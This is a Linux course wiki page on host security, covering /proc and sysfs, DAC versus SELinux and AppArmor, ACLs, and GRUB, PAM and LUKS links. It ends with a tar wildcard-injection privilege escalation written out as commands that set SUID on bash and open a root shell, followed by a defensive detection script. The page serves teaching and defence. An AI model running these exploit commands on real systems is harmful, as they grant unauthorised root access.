Lesson 07 - chad-p/wiki-linux-class GitHub Wiki
Host Security
Live OS
Partitions
Commands:
df -ahT
fdisk -l
man proc
Modern Linux distributions include a /sys directory as a virtual filesystem (sysfs, comparable to /proc, which is a procfs) that exposes the devices connected to the system and allows some of their attributes to be modified, whereas many traditional UNIX and Unix-like operating systems use /sys as a symbolic link to the kernel source tree.
sysfs is a RAM-based filesystem; it provides a means to export kernel data structures, their attributes, and the linkages between them to userspace.
Proc
- /proc/cpuinfo : CPU information
- /proc/filesystems : filesystem types currently supported by the kernel
- /proc/interrupts : interrupts currently in use, with per-CPU counts
- /proc/ioports : all the I/O port addresses used by devices on the server
- /proc/meminfo : memory usage information
- /proc/modules : kernel modules currently loaded
- /proc/mounts : mounted filesystem information
- /proc/stat : detailed statistics for the running system
- /proc/swaps : swap file information
Mandatory Access Control (MAC)
Discretionary Access Control (DAC) - With DAC, files and processes have owners. Permissions are granted separately to the owning user, the owning group, and others (everyone else), and users have the ability to change permissions on their own files.
On MAC systems like SELinux, by contrast, access is governed by an administratively set policy. Even if the DAC settings on your home directory are changed, an SELinux policy in place to prevent another user or process from accessing the directory will still keep the system safe.
- SELinux = Red Hat based
- AppArmor = Ubuntu, Debian, SUSE
SELINUX
- https://www.redhat.com/en/topics/linux/what-is-selinux
- https://github.com/SELinuxProject/selinux-notebook
- https://www.thegeekdiary.com/understanding-selinux-policies-in-linux/
AppArmor
ACL
getfacl
setfacl
setfacl -m g:students:rwx file
Encryption
LUKS
GRUB
- https://www.systranbox.com/what-is-grub-and-why-is-it-important/
- https://www.tecmint.com/password-protect-grub-in-linux/
- https://www.tecmint.com/reset-forgotten-root-password-in-debian/
PAM
- https://www.redhat.com/sysadmin/pluggable-authentication-modules-pam
- https://cyber.vumetric.com/vulns/linux-pam/linux-pam/
- https://www.tecmint.com/configure-pam-in-centos-ubuntu-linux/
- https://tldp.org/HOWTO/User-Authentication-HOWTO/x115.html
- https://www.techradar.com/how-to/how-to-add-two-factor-authentication-to-linux-with-google-authenticator
Wildcard Exploit
- https://www.davila.me/menu/vulnerability-methods/wildcard-injection
- https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb
echo "chmod +s /bin/bash" > exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"
# remove comment in root crontab
bash -p
whoami
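The pattern above works because a cron job that runs tar with a bare `*` glob lets any entry whose name begins with `-` be parsed as a tar option. As an added defender-side example (not from the class wiki), this POSIX shell script flags such entries in a directory that is about to be archived and shows an archive invocation that never passes a glob to tar; the helper names are hypothetical.

```shell
#!/bin/sh
# Added example, not part of the class wiki: detect directory entries
# that a `tar ... *` job would misinterpret as options, and archive
# without a glob so no filename can ever be read as an option.

# find_option_like_names DIR
# Prints every entry in DIR whose name starts with "-" (e.g. a planted
# "--checkpoint-action=..." file) and returns 1 if any exist, 0 if clean.
find_option_like_names() {
    dir=$1
    found=0
    # The glob is prefixed with "$dir/", so expansions always start with
    # the directory path and are never seen as options by printf.
    for entry in "$dir"/-*; do
        [ -e "$entry" ] || continue   # literal pattern when no match
        printf 'suspicious entry: %s\n' "$entry"
        found=1
    done
    return "$found"
}

# archive_dir_safely DIR OUT
# Uses -C DIR and the literal path "." instead of a shell glob; tar
# receives no attacker-controlled argument at all.
archive_dir_safely() {
    tar -cf "$2" -C "$1" .
}

# Constructed demonstration on a temporary directory.
demo=$(mktemp -d)
touch "$demo/report.txt"
touch "$demo/--checkpoint=1"     # constructed, mimics the planted file
if find_option_like_names "$demo"; then
    echo "clean: safe to archive with a glob"
else
    echo "refusing glob-based archive; use archive_dir_safely instead"
fi
rm -rf "$demo"
```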